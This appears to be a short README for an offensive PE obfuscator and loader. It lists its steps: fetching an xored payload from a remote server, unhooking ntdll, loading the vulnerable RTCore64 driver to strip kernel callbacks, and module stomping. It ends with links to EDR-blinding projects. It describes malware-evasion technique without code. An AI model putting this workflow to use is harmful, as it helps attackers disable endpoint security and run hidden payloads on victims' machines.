PE obfuscator with Evasion in mind , needs Admin Privilege in order to load RTCore64 driver.
PE-Obfuscator.mp4
- Gets xored Fileless PE from a remote server
- Drop the Loader in the disk
- Add random section to that Loader
- Add the xored Fileless PE to the new created Loader section
- Unhook ntdll from knowndlls
- Drop RTCore64 to the disk
- Load/Install RTCore64
- Exploit RTCore64 to Remove Kernel Callbacks
- xor PE
- Map/Load PE from the added Section
- Stomped a big module that fit the PE.
https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
https://github.com/br-sn/CheekyBlinder
https://github.com/lawiet47/STFUEDR
https://papers.vx-underground.org/papers/Windows/Infection/2015-03-06%20-%20PE%20Infection%20-%20Add%20a%20PE%20section%20-%20with%20code.txt